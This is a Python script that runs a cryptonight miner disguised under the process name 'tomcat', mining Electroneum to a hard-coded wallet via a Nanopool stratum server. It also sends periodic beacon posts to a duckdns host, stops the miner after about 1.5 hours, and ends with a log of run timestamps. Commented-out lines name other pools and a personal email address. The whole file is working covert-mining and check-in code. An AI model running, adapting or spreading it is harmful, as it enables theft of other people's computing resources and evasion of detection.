import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:06.417618
#2018-02-17 16:12:05.934733
#2018-02-17 18:01:05.541097
#2018-02-17 19:50:08.424054
#2018-02-17 21:39:04.184715
#2018-02-17 23:23:05.796662
#2018-02-18 01:12:01.684384
#2018-02-18 02:59:05.149132
#2018-02-18 04:48:07.999975
#2018-02-18 06:38:03.901952
#2018-02-18 08:27:06.064061
#2018-02-18 10:14:05.747284
#2018-02-18 12:00:10.803311
#2018-02-18 13:44:04.950366
#2018-02-18 15:35:04.052419
#2018-02-18 17:23:01.451918
#2018-02-18 19:11:07.335771
#2018-02-18 20:57:05.992818
#2018-02-18 22:45:06.422328
#2018-02-19 00:34:07.459854
#2018-02-19 02:19:03.421224
#2018-02-19 04:07:06.627609
#2018-02-19 05:51:05.123385
#2018-02-19 07:39:05.058853
#2018-02-19 09:28:08.016566
#2018-02-19 11:17:07.078001
#2018-02-19 13:06:06.456269
#2018-02-19 14:54:01.696761
#2018-02-19 16:41:07.774550
#2018-02-19 18:28:07.855608
#2018-02-19 20:14:06.291796
#2018-02-19 22:03:04.041695
#2018-02-19 23:48:05.263530
#2018-02-20 01:36:07.034923
#2018-02-20 03:23:07.276426
#2018-02-20 05:10:07.283444
#2018-02-20 06:53:01.600787
#2018-02-20 08:39:04.443971
#2018-02-20 10:23:06.101689
#2018-02-20 12:08:09.307581
#2018-02-20 13:57:08.818683
#2018-02-20 15:42:05.429399
#2018-02-20 17:28:05.853684
#2018-02-20 19:17:04.390048
#2018-02-20 21:05:04.951283
#2018-02-20 22:49:07.066323
#2018-02-21 00:33:07.574943
#2018-02-21 02:19:01.955547
#2018-02-21 04:06:05.014279
#2018-02-21 05:52:06.612492
#2018-02-21 07:40:06.227633
#2018-02-21 09:25:06.947327
#2018-02-21 11:13:08.206788
#2018-02-21 13:01:06.222101
#2018-02-21 14:48:02.022889
#2018-02-21 16:35:07.377947
#2018-02-21 18:24:10.008530
#2018-02-21 20:13:04.106397
#2018-02-21 22:02:05.692243
#2018-02-21 23:49:04.166872
#2018-02-22 01:39:04.250330
#2018-02-22 03:26:03.983746
#2018-02-22 05:13:05.110416
#2018-02-22 06:57:06.509342
#2018-02-22 08:44:08.414062
#2018-02-22 10:33:06.619828
#2018-02-22 12:18:08.117332
#2018-02-22 14:03:06.115818
#2018-02-22 15:49:06.392986
#2018-02-22 17:35:10.993848
#2018-02-22 19:21:07.089480
#2018-02-22 21:12:05.003463
#2018-02-22 22:57:01.604109
#2018-02-23 00:44:01.360971
#2018-02-23 02:32:05.933379
#2018-02-23 04:20:07.306593
#2018-02-23 06:05:07.099631
#2018-02-23 07:50:09.256034
#2018-02-23 09:48:08.189958
#2018-02-23 11:48:07.566515
#2018-02-23 13:39:08.451637
#2018-02-23 15:27:04.980122
#2018-02-23 17:14:08.657086
#2018-02-23 18:58:07.889281
#2018-02-23 20:46:04.073619
#2018-02-23 22:33:08.602315
#2018-02-24 00:18:08.554446
#2018-02-24 02:11:04.242744
#2018-02-24 04:01:06.267306
#2018-02-24 06:42:05.304181
#2018-02-24 08:31:06.163314
#2018-02-24 10:18:06.110278
#2018-02-24 12:13:02.090831
#2018-02-24 13:59:06.343608
#2018-02-24 15:50:08.403757
#2018-02-24 17:39:04.032509
#2018-02-24 19:24:05.486710
#2018-02-24 21:15:08.594571
#2018-02-24 23:51:06.419614
#2018-02-25 03:41:04.569958
#2018-02-25 07:26:04.943669